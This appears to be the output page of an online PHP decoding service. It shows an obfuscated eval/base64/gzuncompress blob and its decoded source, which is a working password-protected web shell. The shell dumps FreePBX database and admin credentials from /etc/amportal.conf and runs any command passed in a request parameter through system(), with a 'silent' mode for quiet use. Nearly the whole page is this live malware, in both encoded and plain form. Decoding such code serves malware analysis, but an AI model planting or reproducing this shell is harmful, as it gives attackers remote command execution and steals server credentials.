Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJy1UU1vgkAQPeOvGIkROLSIitr4kWrqwYO2lfZkDUEYlARYwq..
Decoded Output download
session_start();
if (isset($_REQUEST['p']) && md5($_REQUEST['p']) == '583e248fa71b31541b817e98102c4e56') {
$_SESSION['dod'] = 'logged';
}
if (!isset($_SESSION['dod'])) {
echo '<form action = "" method = "post" ><input size = 60 type = text name = "p" /><input type = submit value = "Badr" /></form>';
exit("Badr");
}
if (isset($_SESSION['dod']) && $_SESSION['dod'] == 'logged' && !isset($_REQUEST['silent'])) {
echo '<form action = "" method = "post" ><input size = 60 type = text name = "c" /><input type = submit value = "do" /></form>';
echo "<xmp>";
@system("grep AMPDB /etc/amportal.conf");
echo "---------------------
";
@system("grep ARI_ADMIN /etc/amportal.conf");
echo "---------------------
";
@system($_REQUEST['c']);
echo "</xmp>";
}else{
echo "<xmp>";
@system($_REQUEST['c']);
echo "</xmp>";
}
Did this file decode correctly?
Original Code
<?php
eval(gzuncompress(base64_decode('eJy1UU1vgkAQPeOvGIkROLSIitr4kWrqwYO2lfZkDUEYlARYwq6N1vjfu6BWkTY9NN3TZObNm/feUqTUI6FJmRUzWWkXPBdkj1JkcsmcDp9fh8bLTIqkuQLlMgSOnmt3uyDprRpW6y3XamqLmqbXtUVLa+JdS6tU7TrqDUmBXQH4K5nG0DBGj5OZ5BBHmgNf9slyiY7ULuzT48XT9SxSOVGgvSIgdVwSB2DZjIvnJKIIAbIVcZI6IpSJ0Ot4YbRmQL0P5N1GBdg2SiqGGwahFWCKFUE9IY9zul4EHoN3y1+nkIHlxClKTW72uFABNx6TDwMl0Z1J7Up3klve9tl3Mi/mEqeejyH7N9v277YdkjX9JULsbIKoJx4693RLGQayuIwxgv746WEAKjJbtYKIxMzyb20SuklK5/2b795byBmFK7rpyOw/jEeTP1BeirzI1+bRZjypR1N79Cnu+BdnrAo/Ugg5gk904fNC')));
?>
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | aa18c2d9efa52e58ff59513687c1938d |
Eval Count | 1 |
Decode Time | 53 ms |